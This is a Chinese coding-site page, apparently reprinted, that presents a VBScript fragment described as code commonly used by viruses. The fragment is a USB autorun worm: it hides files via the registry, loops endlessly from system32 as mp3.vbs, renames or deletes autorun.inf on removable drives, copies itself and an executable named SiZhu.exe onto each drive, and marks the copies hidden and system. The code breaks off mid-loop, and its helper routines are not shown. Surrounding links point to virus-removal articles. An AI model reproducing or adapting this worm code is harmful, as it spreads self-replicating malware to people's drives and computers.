首页 > 编程 > VBScript > 正文

一段病毒常用的VBS代码

2019-10-26 18:03:16
字体:
来源:转载
供稿:网友
复制代码 代码如下:

On error resume next
Dim fso,wshell,curfolder,curdristr,curdri
Set fso=createobject("scripting.filesystemobject")
Set wshell=CreateObject("WScript.shell")
Set curfolder=fso.GetFolder(".")
curdristr=Left(WScript.ScriptFullName,3)
Set curdri=fso.GetDrive(curdristr)
reghid() '不显示隐藏文件
If WScript.ScriptFullName=fso.GetSpecialFolder(1)&"/mp3.vbs" Then '如果在system32中
For i=1 To 2 Step 0
reghid()
For Each dri In fso.Drives
If dri.DriveType=1 And dri<>"A:" And dri<>"B:" Then
'autorun.inf文件夹改名
If fso.FolderExists(dri.Path&"/autorun.inf") Then
fso.MoveFolder dri.Path&"/autorun.inf",dri.Path&"/Rubbish"
End If
'复制自身及exe文件到移动硬盘
If fso.FileExists(dri.Path&"/mp3.vbs") And fso.FileExists(dri.Path&"/autorun.inf") Then
Else
If fso.FileExists(dri.Path&"/mp3.vbs") Then
fso.DeleteFile dri.Path&"/mp3.vbs",True
ElseIf fso.FileExists(dri.Path&"/autorun.inf") Then
fso.DeleteFile dri.Path&"/autorun.inf",True
End if
fso.CopyFile WScript.ScriptFullName,dri.Path&"/mp3.vbs",True
If fso.FileExists("./SiZhu.exe") And Not fso.FileExists(dri.Path&"/SiZhu.exe") Then
fso.CopyFile "./SiZhu.exe",dri.Path&"/SiZhu.exe",True
End If
autoinf(dri.Path)
'给刚复制的文件加上隐藏属性
Set norkon=fso.GetFile(dri.Path&"/mp3.vbs")
wshell.run "attrib +r +a +s +h "&dri.Path&"/mp3.vbs",0
Set norkon=Nothing

您可能感兴趣的文章:

linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录通过批处理关闭135 137 445等端口的实现代码(勒索病毒)对一个vbs脚本病毒的病毒原理分析php网页病毒清除类VC实现的病毒专杀工具完整实例利用DOS命令来对抗U盘病毒保护U盘数据自制杀u盘病毒的批处理代码c病毒程序原理分析(防范病毒 c语言小病毒示例)解析:清除SQL被注入恶意病毒代码的语句Autorun 病毒清除工具bat代码VBS.Runauto脚本病毒分析篇记事本U盘病毒 Notepad.exe查杀方法美女游戏病毒iwbkvd.exe查杀方法批处理 Autorun 病毒清除工具Rootkit病毒的解决办法
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表

图片精选